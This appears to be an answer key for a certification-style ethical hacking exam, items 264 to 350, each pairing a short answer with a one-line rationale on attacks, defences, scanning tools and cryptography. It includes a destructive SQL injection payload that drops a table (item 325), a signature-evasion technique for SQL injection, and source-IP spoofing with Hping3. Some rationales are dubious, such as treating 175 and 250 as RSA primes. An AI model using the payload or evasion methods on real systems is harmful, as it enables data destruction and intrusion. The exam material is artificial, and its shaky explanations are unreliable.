cybersecurity awareness training
Conduct regular cybersecurity awareness training, focusing on phishing attacks, as it empowers employees to recognize and avoid such threats while maintaining the autonomy granted by a Bring Your Own Device (BYOD) policy.
264
Unauthorized users
Unauthorized users may perform privilege escalation using unnecessarily created accounts, as misconfigurations granting administrative permissions to unknown users can lead to unauthorized access and control over the system.
265
Pulse Wave attack
A Pulse Wave attack sends high-volume traffic pulses at regular intervals and effectively exhausts network resources and is resistant to simple defensive measures like IP-based blocking.
266
client-side encryption
Using client-side encryption and managing encryption keys independently of the CSP ensures that the cloud service provider does not have access to the keys necessary to decrypt the data, thereby securing the data against unauthorized access by the CSP.
267
YARA rules
Writing YARA rules specifically to identify goodware files triggering false positives would help an IDS differentiate between actual threats and legitimate files, reducing false positives without compromising threat detection.
268
Ping of Death attack
System crashes and instability due to traffic with packet sizes exceeding the prescribed limit is indicative of a Ping of Death attack, which involves sending malformed or oversized packets to crash the target system.
269
network segmentation
Implementing network segmentation to separate IIoT devices from the rest of the network reduces the risk of a compromised device affecting the entire network and enhances the overall security of the operational technology environment.
270
vulnerability assessment
Conducting a vulnerability assessment specifically for IoT devices will help identify potential security weaknesses in the IoT integration, providing a basis for implementing appropriate protective measures.
271
LM hashes are disabled
In Windows Vista or a later version, LM hashes are disabled by default, as these systems no longer store LM hashes, to enhance security; this results in blank entries for LM hashes in the SAM file.
272
principle of least privilege
A Zero Trust model operates on the principle of least privilege, verifying each request as if it is from an untrusted source, regardless of its location, thereby providing stringent access control to the cloud resources and enhancing security.
273
Side-Channel Attack
Attacks exploiting a hardware vulnerability to induce misprediction of instructions and using observable side effects to infer data values describe a Side-Channel Attack, specifically targeting the speculative execution in processors.
274
server configuration audits
Performing regular server configuration audits helps to identify and rectify potential misconfigurations, thereby protecting the web server from attacks that exploit such vulnerabilities.
275
rogue access point
A mobile app security feature should prevent the app from communicating over a network if it detects a rogue access point, thereby protecting against man-in-the-middle attacks conducted through rogue Wi-Fi hotspots by halting potentially compromised communications.
276
ARP Ping Scan
ARP Ping Scan works within the LAN to discover live hosts, bypassing firewalls that might block other types of pings, like ICMP or TCP.
277
yarGen
yarGen generates YARA rules from strings identified in malware files while removing strings that also appear in goodware files, effectively complementing Snort rules in the IDS by enhancing malware detection while minimizing false positives.
278
initial exploitation methods
Analyzing initial exploitation methods used by an adversary is most crucial for initial analysis, as understanding how they gained entry will help identify vulnerabilities and prevent similar attacks in the future.
279
Script Kiddies
Script Kiddies trying to compromise the system using pre-made scripts create a pattern of automated requests from various locations, indicating the lack of advanced skills typically associated with unskilled hackers using readily available tools.
280
brute force attack
Implementing a brute force attack to verify system vulnerability would not assist in detecting a honeypot, as this method does not specifically identify honeypots but rather attempts to exploit potential vulnerabilities.
281
802.1X authentication
Implement 802.1X authentication, as it provides a robust framework for network access control, ensuring that each user is individually authenticated, thereby reducing the risk of unauthorized access due to shared login credentials.
282
Encrypting data
Encrypting data client-side before uploading to the cloud and retaining control of the encryption keys ensures that the client maintains complete control over the encryption process and the keys, complying with their regulatory requirements.
283
Shoulder surfing
Shoulder surfing is not likely to yield beneficial information based on collected Internet infrastructure details (domains, DNS names, Netblocks, IP address information), as it requires physical proximity and does not directly relate to the digital data gathered.
284
WPA2 or WPA3 encryption
Enabling WPA2 or WPA3 encryption on the wireless router provides strong security by encrypting data transmitted over the network, ensuring the network is secure from potential attacks.
285
minimize the attack surface
Unnecessary services could contain vulnerabilities - Always minimize the attack surface, as reducing the number of running services decreases potential entry points for attackers, enhancing the overall security of the web server.
286
updating and patching
Regularly updating and patching the server software is crucial for security, ensuring that vulnerabilities are addressed promptly and the server is secure from common threats.
287
network scanning and monitoring tools
Implementing network scanning and monitoring tools can help detect and analyze unauthorized sniffing activities on the network, thereby enhancing the ability to respond to and mitigate these security threats.
288
Diffie-Hellman
Implementing the Diffie-Hellman protocol for secure key exchange allows two parties to securely exchange cryptographic keys over an unsecured communication channel, making it suitable for managing and distributing symmetric keys.
289
blind injection
Utilizing a blind injection technique that uses time delays or error signatures to extract information can infer database details when explicit error messages are not available, by observing the behavior of the application to different inputs.
290
the '-a' option
Hping3 uses the '-a' option to spoof the source IP address, enabling the attacker to conduct the scan while maintaining anonymity.
291
comprehensive approach
Using Hping3 for an ICMP ping scan, Nmap for a SYN, and Metasploit to exploit identified vulnerabilities, provides a comprehensive approach from discovering live hosts to exploiting vulnerabilities.
292
Error-based SQL Injection
Detailed error messages like "Incorrect Syntax near.... ", and "Unclosed quotation mark after the character string...." are examples of Error-based SQL Injection
293
comprehensive training sessions
Conducting comprehensive training sessions for employees on various social engineering methodologies and the risks associated with revealing confidential data would be successful in preventing an employee from unintentionally divulging information during a phone call.
294
utilize a script
To confirm a Cross-Site Scripting vulnerability is present, you may utilize a script hosted on the application's domain to test forms’ ability to bypass a Content Security Policy (CSP).
295
m=90, b=15
m=90, b=15: The server can manage 90 connections per second, but the attacker's 100 connections exceed this, and with each connection held up for 15 seconds, the attack duration could be significant.
296
string concatenation
Leverage string concatenation to break identifiable keywords, as this technique alters the structure of SQL statements in a way that can evade signature-based detection systems while still executing the intended malicious query.
297
anomalies in file movements
Investigate for anomalies in file movements or unauthorized data access attempts within your database system, as APTs often involve stealthy data breaches and unusual internal activities, making such investigations critical for confirming and isolating these threats.
298
Cloud Access Security Broker (CASB)
Deploying a Cloud Access Security Broker (CASB) provides comprehensive monitoring of cloud resources, real-time threat detection, and ensures consistent enforcement of security policies across all cloud workloads.
299
eMailTrackerPro
eMailTrackerPro is designed to track the source and travel path of an email, including time spent reading the email, geolocation, and device type, but not to identify or list all email accounts associated with a domain.
300
external medium
Store the potentially malicious program on an external medium, such as a CD-ROM, before analysis on the sheep dip computer, to avoid direct transfer to the isolated system and to maintain the security of the production environment.
301
fix all identified vulnerabilities
An organization is at fault if it does not fix all identified vulnerabilities, reflecting a gap in their approach to cybersecurity by prioritizing limited resources over addressing all known risks.
302
Wi-Fi password
If the Wi-Fi password is too complex and long it is difficult to crack as complex and lengthy passwords significantly increase the time and computational power required for successful brute-force attacks.
303
Encrypting data
Encrypting the data client-side before uploading to the SaaS environment and managing encryption keys independently ensures the data remains private and inaccessible to the cloud service provider or any unauthorized entities.
304
FIN or RST packet
Sending a FIN or RST packet to close the connection after it is successfully opened is essential to properly terminate the established connection to maintain ethical hacking practices and avoid unnecessary resource utilization on the target host.
305
WPA2-PSK with AES encryption
WPA2-PSK with AES encryption provides a significantly more secure and modern encryption method compared to WEP, greatly enhancing the security of the company's wireless network.
306
z=600, u=2
z=600, u=2: The attacker devises 2 SQL payloads, each aimed at tables holding 600 records, affecting all columns across all tables, resulting in the highest data volume extracted as per the formula 'E=xyz*u'.
307
std
dnsrecon -t std performs a standard enumeration (std) of the specified IP range, which includes reverse DNS lookups, nameserver, and MX record queries, providing comprehensive information about the domain.
308
UDP Traceroute
Use UDP Traceroute in the Linux operating system as it allows tracing the packet's path without relying on ICMP, which may be blocked by the target's firewall.
309
TCP SYN Ping Scan
A TCP SYN Ping Scan can bypass strict TCP filtering rules by sending SYN packets and analyzing responses, which helps in discovering live hosts even with robust firewall settings.
310
Verify the sender's identity
Verifying the sender's identity before opening any files in Instant Messenger Applications can prevent a malicious file from being opened and executed.
311
IPsec
Implementing IPsec in addition to SSL/TLS provides data integrity checks and ensures the data has not been tampered with during transmission.
312
inference-based assessment
An inference-based assessment solution simulates an attacker's perspective, uses automated scans with updated databases, and is adaptable for multiple networks, aligning well with large organization's requirements.
313
User-directed spidering
User-directed spidering with tools like Burp Suite and WebScarab allows manual control over web crawling, enabling the ethical hacker to uncover and explore website elements that standard automated web spiders cannot access due to specific restrictions.
314
Defense-in-Depth strategy
Establishing a Defense-in-Depth strategy incorporating multiple layers of security measures increases the complexity and decreases the likelihood of a successful attack and provides a comprehensive and layered defense against various types of vulnerabilities and threats.
315
Regularly scanning systems
Regularly scanning systems for any new files and examining them helps in early detection and removal of suspicious files and attachments, effectively reducing the risk of malware installation from email sources.
316
suppress detailed error messages
Always suppress detailed error messages, as they can expose sensitive information about the server's internal workings, making it vulnerable to exploitation by attackers.
317
Maimon Scan
Maimon Scan is very similar to NULL, FIN, and Xmas scans, but uses FIN/ACK, making it less likely to be detected by network security devices that are set to identify and flag more common scan types like SYN scans.
318
Test 1
Test 1: A TCP packet with the SYN and ECN-Echo flags enabled is sent to an open TCP port.
319
h=1987 (prime)
h=1987 (prime): The attacker's packet rate exceeds the server's capacity, causing potential unresponsiveness, as the server's ability to handle packets (h) is lower than the rate at which the attacker sends packets (r), leading to a risk of server failure.
320
IDLE/IPID header scan
Using the IDLE/IPID header scan technique with the command "-sI" allows the attacker to perform a stealthy scan without revealing its IP address.
321
p=175, q=250
p=175, q=250: The key size 'n' is adjusted by increasing both ‘p' and 'q', thereby increasing the complexity of the attacker's decryption process, as a larger 'n' means a higher computational effort required for decryption using Shor's algorithm on a quantum computer.
322
are open
The ports on the target network are open if there is an increase in the IPID number by 2 after an IDLE scan.
323
establish a foothold
The next logical step in the Cyber Kill Chain Methodology following the "Delivery" stage, where the attacker uses the delivered payload to compromise the system would be to exploit the malicious payload delivered to the target organization and establish a foothold.
324
Connecting the system
Connecting the system used for malware analysis to the production network should be avoided, as it risks spreading the malware and potentially compromises the security of the production environment.
325
' OR 'a'='a; DROP TABLE members; --
' OR 'a'='a; DROP TABLE members; --: This payload combines the manipulation of the WHERE clause with a destructive action, causing data loss, which is significantly impactful as it can lead to permanent deletion of critical data from the database.
326
snmp-check
snmp-check gathers a wide array of information about the target, as this tool is specifically designed for SNMP enumeration and can extract detailed network information without modifying any parameters in the SNMP agent's MIB.
327
Passive Footprinting followed by Active Footprinting
Passive Footprinting first, followed by Active Footprinting, minimizes chances of detection during initial information gathering, providing an initial layer of information before engaging in more intrusive techniques that could alert the target.
328
Metamorphic and Rootkit malware
Metamorphic and Rootkit malware embeds itself within system files to avoid detection (a characteristic of rootkits) and changes its code to evade signature-based detection, which is a feature of metamorphic malware.
329
Qualys Vulnerability Management
Qualys Vulnerability Management, as it offers comprehensive coverage and visibility across both on-premise and cloud environments, continuous scanning capabilities, and real-time monitoring for changes, making it ideal for hybrid IT infrastructures.
330
atomicity of operations
Ensuring atomicity of operations between checking and using data resources, as this approach directly addresses TOC/TOU errors by making sure that the state of a resource does not change between the moment it is checked and the moment it is used, preventing race conditions.
331
RST hijacking
Injecting a spoofed reset packet to terminate a legitimate connection aligns with the methodology of RST hijacking, where the attacker sends a reset command to one or both parties in an active connection.
332
intrusion detection systems (IDS)
By deploying network intrusion detection systems (IDS) across an IoT network, an IDS can monitor the network for suspicious activity, including the early signs of a DDoS attack, and take preventative actions to mitigate the attack before it impacts critical services.
333
Probing the IPC share
Probing the IPC share by attempting to brute force admin credentials directly targets the IPC share to enumerate possible points of access or vulnerabilities, which is essential for gathering detailed information about network shares and services.
334
Insider attacks
Insider attacks involve a high degree of understanding of the organization's internal processes and systems; they can be prevented by implementing robust access control and monitoring.
335
Synthetic Identity Theft
Synthetic Identity Theft involves creating a new identity using a combination of real and fabricated information, which the attacker then uses to open bank accounts and receive benefits, making it distinct from other types of identity theft.
336
SYN scan
A SYN scan stealthily identifies open ports without fully establishing a connection, as sending an RST packet after receiving a SYN/ACK prevents the completion of the three-way handshake, making the scan less detectable.
337
location:
location: This operator finds information for a specific location, making it the least useful for extracting sensitive VPN-related information, as VPN configurations and details are unlikely to be tied to specific geographic locations in searchable content.
338
Encrypting all sensitive data
Encrypting all sensitive data stored on a device ensures that even if the device is compromised, sensitive information such as credit card details and personal identification numbers (PINs) remains protected and inaccessible to unauthorized users.
339
Base metric
Base metric represents the inherent qualities of a vulnerability, as it measures the fundamental characteristics that are constant over time and across user environments, providing a foundation for the overall CVSS score.
340
compatible with IPv6
nbtstat is traditionally used with IPv4; if the company's network is using IPv6, an enumeration tool compatible with IPv6 is required for effective NetBIOS enumeration.
341
hardware and software misconfigurations
Checking for hardware and software misconfigurations to identify any possible loopholes is very important, even with up-to-date systems and trained employees, as misconfigurations can remain a significant source of vulnerabilities in a secure setup.
342
Thin Whois
The thin Whois model only provides limited information about the domain, such as the registrar and name servers, requiring further queries to other servers for complete details, which may appear as incomplete data retrieval.
343
bypass the special character filter
A hacker may attempt to bypass the special character filter by encoding his malicious input, which could potentially enable him to successfully inject damaging SQL queries, as encoding can help evade filters that are designed to block known attack patterns and special characters.
344
AES key size of 256
An AES key size of 256 bits provides a high level of security, which is crucial against a quantum algorithm threat, while maintaining a reasonable balance with performance, as RSA key generation time is primarily influenced by the RSA key size rather than the AES key size.
345
Enforcing a policy
Enforcing a policy that only allows app installations from approved corporate app stores directly addresses the risk of malicious app installations by ensuring that only vetted and secure apps can be installed on company-provided devices.
346
ntptrace -n -m 5 [servername/IP_address]
When executing ntptrace -n -m 5 [servername/IP_address], the '-n' option avoids DNS resolution for faster results, and '-m 5' limits the maximum number of NTP servers in the trace, making it efficient to understand the NTP hierarchy and server connections.
347
pretexting
In pretexting, fraudsters may impersonate executives from financial institutions, telephone companies, and other businesses, potentially leading to a network vulnerability in which they gain access to proprietary project details.
348
NetBIOS Session Service
Exploiting the NetBIOS Session Service on TCP port 139 can give unauthorized access to the file system, which can in turn be used to gain information about an enterprise's internal network.
349
employ intrusion detection systems
After discovering a keylogger, the team should employ intrusion detection systems and regularly update the system software, as these measures can help detect unauthorized programs and vulnerabilities that keyloggers exploit to gain access.
350
Diffie-Hellman protocol
Applying the Diffie-Hellman protocol to exchange the symmetric key allows two parties to securely exchange a symmetric key over an insecure channel, which can then be used to encrypt and decrypt sensitive data.